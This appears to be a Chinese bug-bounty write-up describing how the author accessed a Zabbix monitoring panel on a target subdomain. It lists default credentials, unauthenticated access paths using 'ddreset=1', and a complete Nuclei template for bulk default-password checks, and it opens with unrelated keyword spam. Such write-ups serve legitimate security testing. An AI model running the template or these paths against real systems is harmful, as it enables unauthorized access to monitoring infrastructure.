网站备案信息注销,庆阳门户网,文字转图片生成器在线制作,网站页面制作视频找到一个某src的子站#xff0c;通过信息收集插件#xff0c;发现ZABBIX-监控系统#xff0c;可以日一下 使用谷歌搜索历史漏洞#xff1a;zabbix漏洞 通过目录扫描扫描到后台#xff0c;谷歌搜索一下有没有默认弱口令 成功进去了#xff0c;挖洞就是这么简单 搜索文章还…找到一个某src的子站通过信息收集插件发现ZABBIX-监控系统可以日一下 使用谷歌搜索历史漏洞zabbix漏洞 通过目录扫描扫描到后台谷歌搜索一下有没有默认弱口令 成功进去了挖洞就是这么简单 搜索文章还报过未授权访问漏洞打一波 /overview.php?ddreset1/srv_status.php?ddreset1/latest.php?ddreset1/zabbix.php?actionproblem.viewamp;ddreset1 又成功进去了已经清除缓存在拼接路径的进去成功寻找功能点在搜索位置输入任何东西前端页面就会显示什么猜测可能存在反射xss但没什么用继续测试ssti注入 不存在这个站还可以getshell但是点到位置后台进去了人也进去了 黑盒测试ssti注入这个工具推荐一下用这个工具还挖出过几个洞这个感觉已经是公开最好的工具了GitHub - vladko312/SSTImap: Automatic SSTI detection tool with interactive interface 顺便写了一个nuclei批量默认密码验证脚本
【Nuclei-Poc】 id: zabbix-default-credential-checkinfo:name: Zabbix Default Credential Checkauthor: severity: highdescription: Check for default credentials in Zabbix.tags: zabbix,default,credrequests:- method: POSTpath:- {{BaseURL}}/zabbix/index.phpbody: |nameAdminpasswordzabbixautologin1enterSigninheaders:Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Origin: {{BaseURL}}Referer: {{BaseURL}}/zabbix/matchers-condition: andmatchers:- type: wordwords:- Location: zabbix.php?actiondashboard.viewpart: header- type: statusstatus:- 302
【验证】
.\nuclei -l xx.txt -t xx.yaml 申明本账号所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法。